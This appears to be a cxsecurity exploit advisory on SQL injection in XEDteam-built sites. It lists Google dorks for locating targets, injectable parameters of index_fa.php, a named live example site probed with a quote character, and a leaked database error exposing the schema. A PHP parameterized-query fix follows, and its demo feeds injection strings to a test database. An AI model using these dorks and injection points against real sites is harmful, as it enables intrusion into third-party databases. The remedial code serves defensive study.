Powered By XEDteam (Design and Development: Zed Group) Iran SQL Injection Vulnerability

2018.09.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################################################
# Exploit Title : Powered By XEDteam (Design and Development: Zed Group) Iran SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 28/09/2018
# Vendor Homepage : xedteam.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''Powered By: XEDteam.''
intext:''طراحی و توسعه: گروه زد.''
inurl:''/index_fa.php''
Powered By: XEDteam.

# Exploit :
/index_fa.php?option=product&task=list&p=[SQL Injection]
/index_fa.php?option=product&task=list&p=-[ID-NUMBER]&brand=&name=&feature=[SQL Injection]
/index_fa.php?option=product&task=list&p=-[ID-NUMBER]&brand=&name=&feature=[ID-NUMBER]&type=&size=[SQL Injection]
/index_fa.php?option=product&task=list&p=-[ID-NUMBER]&brand=&name=&feature=[ID-NUMBER]&type=&size=[ID-NUMBER]&print_type=&glaze=[SQL Injection]
#################################################################################################
# Example Site => amintile.ir/index_fa.php?option=product&task=list&p=-1%27
=> [ Proof of Concept ] => archive.is/v2AUm

# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near \'-15, 15\' at line 16
SQL=SELECT p.id, IF(gn.value = \'\' OR gn.value IS NULL, n.value, gn.value) AS name, p.group_id, g.value AS glaze, p.image,\n
 GROUP_CONCAT(DISTINCT s.width, \'x\', s.height) AS size, p.image, p.layout,\n
 pt.value AS print_type\n
 FROM smb_product AS p\n
 LEFT JOIN smb_translation AS n ON n.object = p.id AND n.type = \'product_name\' AND n.language = \'fa\'\n
 LEFT JOIN smb_translation AS gn ON gn.object = p.id AND gn.type = \'product_group_name\' AND gn.language = \'fa\'\n
 LEFT JOIN smb_translation AS g ON g.object = p.glaze_id AND g.type = \'glaze_name\' AND g.language = \'fa\'\n
 LEFT JOIN smb_translation AS pt ON pt.object = p.print_type_id AND pt.type = \'print_type_name\' AND pt.language = \'fa\'\n
 LEFT JOIN smb_product AS pg ON pg.group_id = p.id AND pg.group_id != 0\n
 LEFT JOIN smb_product_sizes AS sz ON sz.product = p.id OR (pg.id IS NOT NULL AND sz.product = pg.id)\n
 LEFT JOIN smb_product_size AS s ON s.id = sz.size\n
 LEFT JOIN smb_product_features AS f ON f.product = p.id\n
 WHERE 1=1 AND (p.group_id = 0 OR p.group_id = p.id)\n
 GROUP BY p.id\n
 ORDER BY p.ordering\n
 LIMIT -15, 15
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
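
A defensive counterpart to the error output above, added here as an example and not taken from the vendor's code: the page number and filter values are validated as integers and bound as parameters, so a value such as `-1'` can neither produce a negative LIMIT offset nor reach the SQL text. The `positive_int()` and `list_products()` helpers, the reduced `smb_product` schema and the sample rows are assumptions constructed for illustration (PHP 8, in-memory SQLite via PDO).

```php
<?php
declare(strict_types=1);

const PER_PAGE = 15; // page size implied by "LIMIT -15, 15" in the error above

/** Return $raw as an integer >= 1, or $default for anything else. */
function positive_int(mixed $raw, int $default): int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return is_int($v) ? $v : $default;
}

/** Hypothetical listing helper: every request value is validated, then bound. */
function list_products(PDO $db, array $query): array
{
    $page   = positive_int($query['p'] ?? null, 1);
    $offset = ($page - 1) * PER_PAGE; // never negative

    $sql    = 'SELECT p.id FROM smb_product AS p WHERE 1=1';
    $params = [];
    // Fixed allow-list maps request keys to columns; values become placeholders.
    $filters = ['glaze' => 'p.glaze_id', 'print_type' => 'p.print_type_id'];
    foreach ($filters as $key => $column) {
        if (($query[$key] ?? '') !== '') {
            $sql .= " AND $column = :$key";
            $params[$key] = positive_int($query[$key], 0); // id 0 assumed unused
        }
    }
    $sql .= ' ORDER BY p.ordering LIMIT :lim OFFSET :off';

    $stmt = $db->prepare($sql);
    foreach ($params as $key => $value) {
        $stmt->bindValue(":$key", $value, PDO::PARAM_INT);
    }
    $stmt->bindValue(':lim', PER_PAGE, PDO::PARAM_INT);
    $stmt->bindValue(':off', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed demo: 20 sample rows in in-memory SQLite (assumes pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE smb_product (id INTEGER PRIMARY KEY, glaze_id INT, print_type_id INT, ordering INT)');
for ($i = 1; $i <= 20; $i++) {
    $db->exec(sprintf('INSERT INTO smb_product VALUES (%d, %d, 1, %d)', $i, $i % 2 + 1, $i));
}
foreach ([['p' => "-1'"], ['p' => '2'], ['p' => '1', 'glaze' => "1' OR '1'='1"]] as $q) {
    printf("%s => %d rows\n", json_encode($q), count(list_products($db, $q)));
}
```

Database error text should also be kept out of the HTTP response and logged server-side instead, since the full query in the error shown above discloses table and column names.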



Copyright 2018, cxsecurity.com

 
